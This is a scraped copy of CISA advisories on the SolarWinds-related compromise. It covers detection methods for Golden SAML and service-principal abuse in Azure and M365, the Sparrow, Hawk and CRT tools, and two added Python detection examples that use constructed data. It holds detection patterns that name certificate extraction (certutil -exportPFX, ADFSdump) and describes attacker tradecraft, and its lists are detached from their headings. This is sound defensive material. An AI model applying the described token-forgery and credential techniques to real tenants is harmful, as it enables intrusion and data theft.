    Hawk is an open-source, PowerShell-driven, community-developed tool network defenders can use to quickly and easily gather data from O365 and Azure for security investigations. Incident responders and network defenders can investigate specific user principals or the entire tenant. Data it provides include IP addresses and sign-in data. Additionally, Hawk can track IP usage for concurrent login situations. Hawk users should review login details for administrator accounts and take the following steps.

    CrowdStrike Azure Reporting Tool

    CrowdStrike's Azure Reporting Tool (CRT) can help network defenders analyze their Microsoft Azure AD and M365 environment to help organizations analyze permissions in their Azure AD tenant and service configuration. This tool has minor overlap with Sparrow; it shows unique items, but it does not cover the same areas. CISA is highlighting this tool because it is one of the only free, open-source tools available to investigate this activity and could be used to complement Sparrow.

    Detection Tool Distinctions

    Detection Methods

    Microsoft breaks the threat actor’s recent activity into four primary stages, which are described below along with associated detection methods.
    Microsoft describes these stages as beginning with all activity after the compromise of the on-premises identity solution, such as ADFS.[6] Note: this step provides an entry vector to cloud technology environments, and is unnecessary when the threat actor has compromised an identity solution or credential that allows the APT direct access to the cloud (e.g., without leveraging the SolarWinds Orion vulnerability).

    Stage 1: Forging a trusted authentication token used to access resources that trust the on-premises identity provider

    These attacks (often referred to as “Golden Security Assertion Markup Language” attacks) can be analyzed using a combination of cloud-based and standard on-premises techniques.[7] For example, network defenders can use OAuth claims for specific principals made at the Azure AD level and compare them to the on-premises identity. Export sign-in logs from the Azure AD portal and look at the Authentication Method field. Note: at portal.azure.com, click on a user and review the authentication details (e.g., date, method, result). Without Sentinel, this is the only way to get these logs, which are critical for this effort.

    Detection Method 1: Correlating service provider login events with corresponding authentication events in Active Directory Federation Services (ADFS) and Domain Controllers

    Using SAML single sign-on, search for any logins to service providers that do not have corresponding event IDs 4769, 1200, and 1202 in the domain.

    Detection Method 2: Identifying certificate export events in ADFS

    Look for:

    Detection Method 3: Customizing SAML response to identify irregular access

    This method serves as prevention for the future (and would only detect future, not past, activity), as it helps identify irregularities from the point of the change forward.
    Organizations can modify SAML responses to include custom elements for each service provider to monitor and detect any anomalous requests.[8]

    Detection Method 4: Detecting malicious ADFS trust modification

    A threat actor who gains administrative access to ADFS can add a new, trusted ADFS rather than extracting the certificate and private key as part of a standard Golden SAML attack.[9] Network defenders should look for:

    Stage 2: Using the forged authentication token to create configuration changes in the Service Provider, such as Azure AD (establishing a foothold)

    After the threat actor has compromised the on-premises identity provider, they identify their next series of objectives by reviewing activity in the Microsoft Cloud activity space (Microsoft Azure and M365 tenants). The threat actor uses the ability to forge authentication tokens to establish a presence in the cloud environment. The actor adds additional credentials to an existing service principal. Once the threat actor has impersonated a privileged Azure AD account, they are likely to further manipulate the Azure/M365 environment (action on objectives in the cloud). Network defenders should take the following steps.

    Stage 3: Acquiring an OAuth access token for the application using the forged credentials added to an existing application or service principal and calling APIs with the permissions assigned to that application

    In some cases, the threat actor has been observed adding permissions to existing applications or service principals.
    Additionally, the actor has been seen establishing new applications or service principals briefly and using them to add permissions to the existing applications or service principals, possibly to add a layer of indirection (e.g., using it to add a credential to another service principal, and then deleting it).[11] Network defenders should use Sparrow to:

    Stage 4: Once access has been established, the threat actor uses Microsoft Graph API to conduct action on objectives from an external RESTful API (queries impersonating existing applications)

    Network defenders should:

    Microsoft Telemetry Nuances

    The existing tools and techniques used to evaluate cloud-based telemetry sources present challenges not represented in traditional forensic techniques. Primarily, the amount of telemetry retention is far less than the traditional logging facilities of on-premises data sources. Threat actor activity that is more than 90 days old is unlikely to have been saved by traditional sources or be visible with the Microsoft M365 Management API or in the UAL.

    Service principal logging is available using the Azure Portal via the "Service Principal Sign-ins" feature. Enable settings in the Azure Portal (see “Diagnostic Setting”) to ingest logs into Sentinel or a third-party security information and event management (SIEM) tool. An Azure Premium P1 or Premium P2 license is necessary to access this setting as well as other features, such as a log analytics workspace, storage account, or event hub.[12] These logs must be downloaded manually if not ingested by one of the methods listed in the Detection Methods section.

    Global Administrator rights are often required by tools other than Hawk and Sparrow to evaluate M365 cloud security posture. Logging capability and visibility of data varies by licensing models and subscription to premium services, such as Microsoft Defender for O365 and Azure Sentinel.
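    The correlation that Detection Method 1 describes (federated service-provider sign-ins with no matching event IDs 4769, 1200 and 1202 on the domain controller and the ADFS server) worked through as an added Python example; this is not code from the advisory and not Sparrow, Hawk or CRT. It assumes both logs have already been exported to a structured form, that the user field of each has been normalized to the same UPN, that a federated sign-in is marked by the value "Federated" (or "SAML") in the sign-in log's Authentication Method field (an assumption; check what your export actually contains), and that a legitimate sign-in is preceded by its on-premises events within a five-minute window. All records below are constructed.

```python
"""Correlate federated Azure AD sign-ins with on-premises ADFS / DC events.

Added example (not the advisory's code, not Sparrow/Hawk/CRT). A federated
SAML sign-in accepted by the service provider with no matching on-premises
authentication trail is the pattern the advisory's Detection Method 1
describes for a forged ("Golden SAML") token.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Event IDs the advisory names: 4769 = Kerberos service ticket requested (DC),
# 1200 = token issued and 1202 = federated authentication succeeded (ADFS).
EXPECTED_EVENT_IDS = {4769, 1200, 1202}
WINDOW_BEFORE = timedelta(minutes=5)       # assumption: on-prem events precede the cloud sign-in by at most this
SLACK_AFTER = timedelta(minutes=1)         # assumption: tolerance for clock skew between sources
FEDERATED_MARKERS = {"federated", "saml"}  # assumption: Authentication Method values that denote ADFS SSO


@dataclass(frozen=True)
class CloudSignIn:
    time: datetime
    user: str          # UPN as shown in the Azure AD sign-in log
    app: str           # service provider / application signed in to
    auth_method: str   # the sign-in log's "Authentication Method" field


@dataclass(frozen=True)
class OnPremEvent:
    time: datetime
    event_id: int
    user: str          # normalized to the same UPN form as the cloud log
    source: str        # "DC" or "ADFS"


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample data.
#   alice: legitimate SSO with a full on-prem trail.
#   bob:   federated sign-in with no on-prem events in the window (forged-token pattern).
#   carol: ADFS events present but no 4769 (partial trail, worth a second look).
#   dave:  cloud-only password sign-in; no ADFS trail is expected, so it is skipped.
SAMPLE_CLOUD_SIGNINS = [
    CloudSignIn(_t("2021-01-05T09:12:00"), "alice@corp.example", "Exchange Online", "Federated"),
    CloudSignIn(_t("2021-01-05T11:40:00"), "bob@corp.example", "Microsoft Graph", "Federated"),
    CloudSignIn(_t("2021-01-05T14:05:30"), "carol@corp.example", "SharePoint Online", "Federated"),
    CloudSignIn(_t("2021-01-05T15:00:00"), "dave@corp.example", "Exchange Online", "Password"),
]
SAMPLE_ONPREM_EVENTS = [
    OnPremEvent(_t("2021-01-05T09:11:05"), 4769, "alice@corp.example", "DC"),
    OnPremEvent(_t("2021-01-05T09:11:20"), 1202, "alice@corp.example", "ADFS"),
    OnPremEvent(_t("2021-01-05T09:11:21"), 1200, "alice@corp.example", "ADFS"),
    OnPremEvent(_t("2021-01-05T10:00:00"), 4769, "bob@corp.example", "DC"),  # too early for bob's 11:40 sign-in
    OnPremEvent(_t("2021-01-05T14:04:50"), 1202, "carol@corp.example", "ADFS"),
    OnPremEvent(_t("2021-01-05T14:04:51"), 1200, "carol@corp.example", "ADFS"),
]


def find_unbacked_signins(signins: List[CloudSignIn], events: List[OnPremEvent]) -> List[Dict]:
    """Return federated sign-ins that lack one or more of the expected on-prem events."""
    by_user: Dict[str, List[OnPremEvent]] = {}
    for e in events:
        by_user.setdefault(e.user.lower(), []).append(e)

    findings = []
    for s in sorted(signins, key=lambda x: x.time):
        if s.auth_method.lower() not in FEDERATED_MARKERS:
            continue  # only SSO through ADFS should leave a 4769/1200/1202 trail
        seen = set()
        for e in by_user.get(s.user.lower(), []):
            in_window = s.time - WINDOW_BEFORE <= e.time <= s.time + SLACK_AFTER
            if in_window and e.event_id in EXPECTED_EVENT_IDS:
                seen.add(e.event_id)
        missing = sorted(EXPECTED_EVENT_IDS - seen)
        if missing:
            findings.append({"time": s.time.isoformat(), "user": s.user,
                             "app": s.app, "missing_event_ids": missing})
    return findings


if __name__ == "__main__":
    for f in find_unbacked_signins(SAMPLE_CLOUD_SIGNINS, SAMPLE_ONPREM_EVENTS):
        print(f"{f['time']} {f['user']} -> {f['app']}: no on-prem event(s) {f['missing_event_ids']}")
```

    The function reports which of the three event IDs are missing rather than a single yes/no, because a partial trail usually has a benign explanation (for instance 4769 not being audited on the domain controllers) while a federated sign-in with no on-premises trace at all is the strong signal to escalate.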
According to CrowdStrike, "There was an inability to audit via API, and there is the requirement for global admin rights to view important information which we found to be excessive. Key information should be easily accessible."[13] Documentation for specific event codes, such as UserAuthenticationMethod 16457, which may indicate a suspicious SAML token forgery, is no longer available in the M365 Unified Access Log. Auditing narratives on some events no longer exist as part of core Microsoft documentation sources. The use of industry-standard SIEMs for log detection is crucial for providing historical context for threat hunting in Microsoft cloud environments. Standard G3/E3 licenses only provide 90 days of auditing; with the advanced auditing license that is provided with a G5/E5 license, audit logs can be extended to retain information for a year. CISA notes that this license change is proactive, rather than reactive: it allows enhanced visibility and features for telemetry from the moment of integration but does not provide retroactive visibility on previous events or historical context. A properly configured SIEM can provide: Built-in tools, such as Microsoft Cloud Services and M365 applications, provide much of the same visibility available from custom tools and are mapped to the MITRE ATT&CK framework and easy-to-understand dashboards.[14] However, these tools often do not have the ability to pull historical data older than seven days. Therefore, storage solutions that appropriately meet governance standards and usability metrics for analysts for the SIEM must be carefully planned and arranged. Ingest comma separated values (CSV) output from the Sparrow PowerShell script into Splunk. 
Sparrow output will have the following default filenames, which should not be modified: AppUpdate_Operations_Export.csv,AppRoleAssignment_Operations_Export.csv, Consent_Operations_Export.csv, Domain_List.csv, Domain_Operations_Export.csv, FileItems_Operations_Export.csv, MailItems_Operations_Export.csv, PSLogin_Operations_Export.csv, PSMailbox_Operations_Export.csv, SAMLToken_Operations_Export.csv, ServicePrincipal_Operations_Export.csv Copy and paste the contents of the .xml file (aviary.xml in the root directory) into a new dashboard. Use the data selection filters to point to the indexed Sparrow data (see figure 1)    Investigate high-value administrative accounts to detect anomalous or unusual activity (Global Admins). Enable PowerShell logging, and evaluate PowerShell activity in the environment not used for traditional or expected purposes. PowerShell logging does not reveal the exact cmdlet that was run on the tenant. Look for users with unusual sign-in locations, dates, and times. Check permissions of service principals and applications in M365/Azure AD. Detect the frequency of resource access from unusual places. Use the tool to pivot to a trusted application and see if it is accessing mail or file items. Review mailbox rules and recent mailbox rule changes. Sparrow differs from CRT by looking for specific indicators of compromise associated with the recent attacks. CRT focuses on the tenant’s Azure AD permissions and Exchange Online configuration settings instead of the unified audit log, which gives it a different output from Sparrow or Hawk. CRT returns the same broad scope of application/delegated permissions for service principals and applications as Hawk. As part of its investigation, Sparrow homes in on a narrow set of application permissions given to the Graph API, which is common to the recent attacks. CRT looks at Exchange Online federation configuration and federation trust, while Sparrow focuses on listing Azure AD domains. 
Among the items network defenders can use CRT to review are delegated permissions and application permissions, federation configurations, federation trusts, mail forwarding rules, service principals, and objects with KeyCredentials. The IP address and Activity_ID in EventCode 410 and the Activity_ID and Instance_ID in EventCode 500. Export-PfxCertificate or certutil-exportPFX in Event IDs 4103 and 4104, which may include detection of a certificate extraction technique. Deleted certificate extraction with ADFSdump performed using Sysmon Event ID 18 with the pipe name \microsoft##wid\tsql\query (exclude processes regularly making this pipe connection on the machine). Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same instance ID for change details (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event). Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same Instance ID for change details. (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event.) Review events, particularly searching for Configuration: Type: IssuanceAuthority where Property Value references an unfamiliar domain. Possible activity of an interrogating ADFS host by using ADFS PowerShell plugins. Look for changes in the federation trust environment that would indicate new ADFS sources. Audit the creation and use of service principal and application credentials. Sparrow will detect modifications to these credentials. Look for unusual application usage, such as dormant or forgotten applications being used again. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application. Look for unexpected trust relationships that have been added to Azure AD. 
(Download the last 30 days of non-interactive sign-ins from the Azure portal or use Azure Sentinel.).[10] Use Hawk (and any sub-modules available) to run an investigation on a specific user. Hawk will provide IP addresses, sign-in data, and other data. Hawk can also track IP usage in concurrent login situations. Review login details for administrator accounts (e.g., high-value administrative accounts, such as Global Admins). Look for unusual sign-in locations, dates, and times. Review new token validation time periods with high values and investigate whether the changes are legitimate or a threat actor’s attempts to gain persistence. Examine highly privileged accounts; specifically using sign-in logs, look for unusual sign-in locations, dates, and times. Create a timeline for all credential changes. Monitor changes in application credentials (the script will export into csv named AppUpdate_Operations_Export). Detect service principal credentials change and service principal change (e.g., if an actor adds new permissions or expands existing permissions). Export and view this activity via the ServicePrincipal_Operations_Export. Record OAuth consent and consent to applications Export and view this record via the Consent_Operations_Export file. Investigate instances of excessive high permissions, including, but not limited to Exchange Online, Microsoft Graph, and Azure AD Graph. Review Microsoft Graph API permissions granted to service principals. Export and view this activity via the ApplicationGraphPermissions csv file. Note: Hawk can also return the full list of service principal permissions for further investigation. Review top actors and the amount of credential modifications performed. Monitor changes in application credentials. Identify manipulation of custom or third-party applications. 
Network defenders should review the catalog of custom or third-party vendors with applications in the Microsoft tenant and perform the above interrogation principles on those applications and trusts. Review modifications to federation trust settings. Review new token validation time periods with high values and investigate whether this was a legitimate change or an attempt to gain persistence by the threat actor. The script detects the escalation of privileges, including the addition of Service Principals (SP) to privileged roles. Export this data into csv called AppRoleAssignment_Operations_Export. In MailItemsAccessed operations, found within the Unified Audit Log (UAL), review the application ID used (requires G5 or E5 license for this specific detail). Query the specific application ID, using the Sparrow script’s app ID investigation capability to interrogate mail and file items accessed for that applicationID (Use the application ID utility for any other suspicious apps that require additional analysis.). Check the permissions of an application in M365/Azure AD using Sparrow. Hawk will return Azure_Application_Audit, and Sparrow will return ApplicationGraphPermissions. Network defenders will see the IP address that Graph API uses. Note: the Microsoft IP address may not show up as a virtual private server/anonymized endpoint. Investigate a specific service principal, if it is a user-specific user account, in Hawk. This activity is challenging to see without Azure Sentinel or manually downloading and reviewing logs from the sign-in portal. Longer term storage of log data. Cross correlation of log data with endpoint data and network data (such as those produced by ADFS servers), endpoint detection and response data, and identity provider information. Ability to query use of application connectors in Azure. Contact InformationCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. 
For any questions related to this report, please contact CISA at 1-888-282-0870 (From outside the United States: +1-703-235-8832) central@cisa.dhs.gov (UNCLASS) us-cert@dhs.sgov.gov (SIPRNET) us-cert@dhs.ic.gov (JWICS) CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/. Resources Azure Active Directory Workbook to Assess Solorigate Risk: https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718 Volexity - Dark Halo Leverages SolarWinds Compromise to Breach Organizations: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ How to Find Activity with Sentinel: https://www.verboon.info/2020/10/monitoring-service-principal-sign-ins-with-azuread-and-azure-sentinel/ Third-Party Walkthrough of the Attack: https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/ National Security Agency Advisory on Detecting Abuse of Authentication Mechanisms: https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF Microsoft 365 App for Splunk: https://splunkbase.splunk.com/app/3786/ CISA Remediation Guidance: https://us-cert.cisa.gov/ncas/alerts/aa20-352a References [1] ZDNet: A Second Hacking Group has Targeted SolarWinds Systems [2] CISA: Supply Chain Compromise [3] Microsoft SolarWinds Post-Compromise Hunting with Azure Sentinel [4] Microsoft Solorigate Resource Center [5] Advanced Audit in Microsoft 365 [6] Microsoft: Understanding “Solorigate’s” Identity IOCs [7] Detection and Hunting of Golden SAML Attack: [8] Ibid [9] Ibid [10] Microsoft: AADServicePrincipalSignInLogs [11] Microsoft: Understanding “Solorigate’s” Identity IOCs [12] Azure Active Directory Sign-in Activity Reports [13] 
CrowdStrike: CrowdStrike Launches Free Tool to Identify and Help Mitigate Risks in Azure Active Directory [14] Microsoft 365 App for Splunk Revisions Initial version: January 8, 2021 February 4, 2021: Removed link and section for outdated product feedback form April 8, 2021: Added Aviary Dashboard information April 15, 2021: Added Attribution Statement This product is provided subject to this Notification and this Privacy & Use policy.
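The Stage 2/3 guidance above asks defenders to build a timeline of credential changes and to count the top actors, and Detection Method 4 asks for Event ID 307 to be correlated with the Event ID 510 records that share its Instance ID. The following added example (it is not Sparrow, Hawk or CRT code) does both over constructed records. Everything in it is an assumption made for the demonstration: the ADFS and Azure AD records are constructed, their field names are a normalized shape rather than the exact ADFS event XML, Unified Audit Log or Sparrow CSV columns, the Operation strings merely follow the Azure AD audit log wording, and the allow list of federation hosts and the set of privileged roles are placeholders an organization would fill from its own environment.

```python
"""Identity-change timeline across ADFS and Azure AD audit data.

Added illustration of the Stage 2/3 and Detection Method 4 guidance; not
Sparrow, Hawk or CRT code.  All records are constructed and the field names
are an assumed normalized shape, not the real ADFS, UAL or Sparrow columns.
"""
from collections import Counter
from datetime import datetime
from urllib.parse import urlparse

# Assumed allow list of federation endpoints the organization operates.
KNOWN_FEDERATION_HOSTS = {"sts.corp.example"}
# Roles whose assignment to a service principal always deserves review.
PRIVILEGED_ROLES = {"Global Administrator", "Application Administrator",
                    "Privileged Authentication Administrator"}

# Constructed ADFS admin-channel events.  Event ID 510 carries the change
# details and shares an InstanceID with the Event ID 307 that announced it.
ADFS_EVENTS = [
    {"EventID": 307, "InstanceID": "a1", "Time": "2020-12-02T03:10:00",
     "Message": "The Federation Service configuration was changed"},
    {"EventID": 510, "InstanceID": "a1", "Time": "2020-12-02T03:10:00",
     "Configuration": "Type: IssuanceAuthority",
     "PropertyValue": "http://sts.unknown-partner.example/adfs/services/trust"},
    {"EventID": 307, "InstanceID": "a2", "Time": "2020-12-05T09:00:00",
     "Message": "The Federation Service configuration was changed"},
    {"EventID": 510, "InstanceID": "a2", "Time": "2020-12-05T09:00:00",
     "Configuration": "Type: IssuanceAuthority",
     "PropertyValue": "http://sts.corp.example/adfs/services/trust"},
]

# Constructed Azure AD audit records.  The Operation strings follow the
# Azure AD audit log wording; Actor/Target/Role are assumed fields.
AZUREAD_AUDIT = [
    {"Time": "2020-12-03T22:41:00", "Operation": "Add service principal credentials.",
     "Actor": "svc-build@corp.example", "Target": "sp:Mail Connector"},
    {"Time": "2020-12-03T22:43:00", "Operation": "Add member to role.",
     "Actor": "svc-build@corp.example", "Target": "sp:Mail Connector",
     "Role": "Global Administrator"},
    {"Time": "2020-12-04T10:00:00", "Operation": "Consent to application.",
     "Actor": "it-admin@corp.example", "Target": "app:HR Dashboard"},
    {"Time": "2020-12-06T15:20:00", "Operation": "Add service principal credentials.",
     "Actor": "svc-build@corp.example", "Target": "sp:Backup Agent"},
]


def adfs_trust_findings(events, known_hosts=KNOWN_FEDERATION_HOSTS):
    """Pair every Event ID 307 with its 510 details (same InstanceID) and flag
    IssuanceAuthority values whose host is outside the allow list."""
    details = {}
    for e in events:
        if e["EventID"] == 510:
            details.setdefault(e["InstanceID"], []).append(e)
    findings = []
    for e in events:
        if e["EventID"] != 307:
            continue
        for d in details.get(e["InstanceID"], []):   # may be several per 307
            if "IssuanceAuthority" not in d.get("Configuration", ""):
                continue
            host = urlparse(d["PropertyValue"]).hostname
            if host not in known_hosts:
                findings.append({"Time": e["Time"], "Source": "ADFS", "Actor": None,
                                 "Finding": f"new issuance authority {host}"})
    return findings


def azuread_findings(records, privileged_roles=PRIVILEGED_ROLES):
    """Pick out credential additions, privileged role grants to service
    principals and consent grants: the changes Stages 2 and 3 ask defenders
    to audit and build a timeline from."""
    findings = []
    for r in records:
        op = r["Operation"]
        if op == "Add service principal credentials.":
            what = f"credential added to {r['Target']}"
        elif (op == "Add member to role." and r["Target"].startswith("sp:")
              and r.get("Role") in privileged_roles):
            what = f"{r['Target']} granted {r['Role']}"
        elif op == "Consent to application.":
            what = f"consent granted to {r['Target']}"
        else:
            continue
        findings.append({"Time": r["Time"], "Source": "AzureAD",
                         "Actor": r["Actor"], "Finding": what})
    return findings


def build_timeline(adfs_events=ADFS_EVENTS, audit=AZUREAD_AUDIT):
    """Merge both sources into one chronological timeline and count which
    actors made the changes (the "review top actors" step)."""
    timeline = sorted(adfs_trust_findings(adfs_events) + azuread_findings(audit),
                      key=lambda f: datetime.fromisoformat(f["Time"]))
    actors = Counter(f["Actor"] for f in timeline if f["Actor"])
    return timeline, actors


if __name__ == "__main__":
    timeline, actors = build_timeline()
    for f in timeline:
        print(f"{f['Time']}  {f['Source']:7}  {f['Actor'] or '-':24}  {f['Finding']}")
    print("top actors:", actors.most_common(3))
```

The 510 records are grouped by Instance ID before the 307 events are walked because, as the Alert notes, one 307 can have several 510 detail events; the second ADFS change in the sample points at a known federation host and therefore produces no finding. In a real investigation the two input lists would come from the ADFS admin log export and from the Sparrow CSVs or a SIEM export, and the allow list from the organization's own inventory of federation partners.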

  • AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
    by CISA on 17 Dicembre 2020 at 3:00 pm

    Original release date: December 17, 2020 | Last revised: April 15, 2021

    Summary

    Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a statement from the White House. For more information on SolarWinds-related activity, go to https://us-cert.cisa.gov/remediating-apt-compromised-networks and https://www.cisa.gov/supply-chain-compromise.

    The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises of U.S. government agencies, critical infrastructure entities, and private sector organizations by an advanced persistent threat (APT) actor beginning in at least March 2020. This APT actor has demonstrated patience, operational security, and complex tradecraft in these intrusions. CISA expects that removing this threat actor from compromised environments will be highly complex and challenging for organizations.

    (Updated January 6, 2021): One of the initial access vectors for this activity is a supply chain compromise of a Dynamic Link Library (DLL) in the following SolarWinds Orion products (see Appendix A). Note: prior versions of this Alert included a single bullet that listed two platform versions for the same DLL. For clarity, the Alert now lists these platform versions that share the same DLL version number separately, as both are considered affected versions.

    - Orion Platform 2019.4 HF5, version 2019.4.5200.9083
    - Orion Platform 2020.2 RC1, version 2020.2.100.12219
    - Orion Platform 2020.2 RC2, version 2020.2.5200.12394
    - Orion Platform 2020.2, version 2020.2.5300.12432
    - Orion Platform 2020.2 HF1, version 2020.2.5300.12432

    Note (updated January 6, 2021): CISA has evidence that there are initial access vectors other than the SolarWinds Orion platform and has identified legitimate account abuse as one of these vectors (for details refer to Initial Access Vectors section).
    Specifically, we are investigating incidents in which activity indicating abuse of Security Assertion Markup Language (SAML) tokens consistent with this adversary’s behavior is present, yet where impacted SolarWinds instances have not been identified. CISA is continuing to work to confirm initial access vectors and identify any changes to the tactics, techniques, and procedures (TTPs). CISA will update this Alert as new information becomes available. Refer to CISA.gov/supply-chain-compromise for additional resources.

    (Updated January 6, 2021): On December 13, 2020, CISA released Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise, ordering federal civilian executive branch departments and agencies to disconnect affected devices. CISA has subsequently issued supplemental guidance to Emergency Directive (ED) 21-01, most recently on January 6, 2021. Note: this Activity Alert does not supersede the requirements of ED 21-01 or any supplemental guidance and does not represent formal guidance to federal agencies under ED 21-01.

    CISA has determined that this threat poses a grave risk to the Federal Government and state, local, tribal, and territorial governments as well as critical infrastructure entities and other private sector organizations. CISA advises stakeholders to read this Alert and review the enclosed indicators (see Appendix B).

    Key Takeaways (updated December 18, 2020)

    - This is a patient, well-resourced, and focused adversary that has sustained long duration activity on victim networks.
    - CISA is investigating other initial access vectors in addition to the SolarWinds Orion supply chain compromise.
    - Not all organizations that have the backdoor delivered through SolarWinds Orion have been targeted by the adversary with follow-on actions.
    - Organizations with suspected compromises need to be highly conscious of operational security, including when engaging in incident response activities and planning and implementing remediation plans.
    (Updated January 8, 2021) For a downloadable list of indicators of compromise (IOCs), see the STIX file.

    (Updated April 15, 2021) See the following Malware Analysis Reports (MARs) for additional technical details and associated IOCs:

    - AR21-039A: MAR-10318845-1.v1 - SUNBURST
    - AR21-039B: MAR-10320115-1.v1 - TEARDROP
    - AR21-105A: MAR-10327841-1.v1 – SUNSHUTTLE

    Technical Details

    Overview

    CISA is aware of compromises, which began at least as early as March 2020, at U.S. government agencies, critical infrastructure entities, and private sector organizations by an APT actor. This threat actor has demonstrated sophistication and complex tradecraft in these intrusions. CISA expects that removing the threat actor from compromised environments will be highly complex and challenging. This adversary has demonstrated an ability to exploit software supply chains and shown significant knowledge of Windows networks. It is likely that the adversary has additional initial access vectors and TTPs that have not yet been discovered. CISA will continue to update this Alert and the corresponding IOCs as new information becomes available.

    Initial Infection Vectors [TA0001]

    (Updated January 6, 2021): CISA is investigating incidents that exhibit adversary TTPs consistent with this activity, including some where victims either do not leverage SolarWinds Orion or where SolarWinds Orion was present but where there was no SolarWinds exploitation activity observed. CISA incident response investigations have identified that initial access in some cases was obtained by password guessing [T1101.001], password spraying [T1101.003], and inappropriately secured administrative credentials [T1078] accessible via external remote access services [T1133]. Initial access root cause analysis is still ongoing in a number of response activities and CISA will update this section as additional initial vectors are identified.
    Volexity has also reported publicly that they observed the APT using a secret key that the APT previously stole in order to generate a cookie to bypass the Duo multi-factor authentication (MFA) protecting access to Outlook Web App (OWA).[1] Volexity attributes this intrusion to the same activity as the SolarWinds Orion supply chain compromise, and the TTPs are consistent between the two. This observation indicates that there are other initial access vectors beyond SolarWinds Orion, and there may still be others that are not yet known.

    SolarWinds Orion Supply Chain Compromise [T1195.002]

    SolarWinds Orion is an enterprise network management software suite that includes performance and application monitoring and network configuration management along with several different types of analyzing tools. SolarWinds Orion is used to monitor and manage on-premise and hosted infrastructures. To provide SolarWinds Orion with the necessary visibility into this diverse set of technologies, it is common for network administrators to configure SolarWinds Orion with pervasive privileges, making it a valuable target for adversary activity.

    The threat actor has been observed leveraging a software supply chain compromise of SolarWinds Orion products[2] (see Appendix A). The adversary added a malicious version of the binary solarwinds.orion.core.businesslayer.dll into the SolarWinds software lifecycle, which was then signed by the legitimate SolarWinds code signing certificate. This binary, once installed, calls out to a victim-specific avsvmcloud[.]com domain using a protocol designed to mimic legitimate SolarWinds protocol traffic. After the initial check-in, the adversary can use the Domain Name System (DNS) response to selectively send back new domains or IP addresses for interactive command and control (C2) traffic.
    Consequently, entities that observe traffic from their SolarWinds Orion devices to avsvmcloud[.]com should not immediately conclude that the adversary leveraged the SolarWinds Orion backdoor. Instead, additional investigation is needed into whether the SolarWinds Orion device engaged in further unexplained communications. If additional Canonical Name record (CNAME) resolutions associated with the avsvmcloud[.]com domain are observed, possible additional adversary action leveraging the backdoor has occurred.

    Based on coordinated actions by multiple private sector partners, as of December 15, 2020, avsvmcloud[.]com resolves to 20.140.0[.]1, which is an IP address on the Microsoft blocklist. This negates any future use of the implants and would have caused communications with this domain to cease. In the case of infections where the attacker has already moved C2 past the initial beacon, infection will likely continue notwithstanding this action.

    SolarWinds Orion typically leverages a significant number of highly privileged accounts and access to perform normal business functions. Successful compromise of one of these systems can therefore enable further action and privileges in any environment where these accounts are trusted.

    Anti-Forensic Techniques

    The adversary is making extensive use of obfuscation to hide their C2 communications. The adversary is using virtual private servers (VPSs), often with IP addresses in the home country of the victim, for most communications to hide their activity among legitimate user traffic. The attackers also frequently rotate their “last mile” IP addresses to different endpoints to obscure their activity and avoid detection. FireEye has reported that the adversary is using steganography (Obfuscated Files or Information: Steganography [T1027.003]) to obscure C2 communications.[3] This technique negates many common defensive capabilities in detecting the activity.
    Note: CISA has not yet been able to independently confirm the adversary’s use of this technique.

    According to FireEye, the malware also checks for a list of hard-coded IPv4 and IPv6 addresses—including RFC-reserved IPv4 and IPv6 IP—in an attempt to detect if the malware is executed in an analysis environment (e.g., a malware analysis sandbox); if so, the malware will stop further execution. Additionally, FireEye analysis identified that the backdoor implemented time threshold checks to ensure that there are unpredictable delays between C2 communication attempts, further frustrating traditional network-based analysis.

    While not a full anti-forensic technique, the adversary is heavily leveraging compromised or spoofed tokens for accounts for lateral movement. This will frustrate commonly used detection techniques in many environments. Since valid, but unauthorized, security tokens and accounts are utilized, detecting this activity will require the maturity to identify actions that are outside of a user’s normal duties. For example, it is unlikely that an account associated with the HR department would need to access the cyber threat intelligence database.

    Taken together, these observed techniques indicate an adversary who is skilled, stealthy with operational security, and is willing to expend significant resources to maintain covert presence.

    Privilege Escalation and Persistence [TA0004, TA0003]

    (Updated January 6, 2021): The adversary has been observed using multiple persistence mechanisms across a variety of intrusions. CISA has observed the threat actor adding authentication credentials, in the form of assigning tokens and certificates, to existing Azure/Microsoft 365 (M365) application service principals.
    These additional credentials provide persistence and escalation mechanisms and a programmatic method of interacting with the Microsoft Cloud tenants (often with Microsoft Graph Application Programming Interface [API]) to access hosted resources without significant evidence or telemetry being generated.

    (Updated January 6, 2021): Microsoft reported that the actor has added new federation trusts to existing on-premises infrastructure, a technique that CISA believes was utilized by a threat actor in an incident to which CISA has responded. Where this technique is used, it is possible that authentication can occur outside of an organization’s known infrastructure and may not be visible to the legitimate system owner. Microsoft has released a query to help identify this activity, as well as a Sentinel detection for identifying changes to the identity federation from a user or application.[4]

    User Impersonation

    (Updated January 6, 2021): The adversary’s initial objectives, as understood today, appear to be to collect information from victim environments. One method the adversary is accomplishing this objective is by compromising the SAML signing certificate using their escalated Active Directory privileges. Once this is accomplished, the adversary creates unauthorized but valid tokens and presents them to services that trust SAML tokens from the environment. These tokens can then be used to access resources in hosted environments, such as email, for data exfiltration via authorized APIs.

    During the persistence phase, the additional credentials being attached to service principals obfuscates the activity of user objects, because they appear to be accessed by the individual, and such individual access is normal and not logged in all M365 licensing levels. CISA has observed in its incident response work adversaries targeting email accounts belonging to key personnel, including IT and incident response personnel.
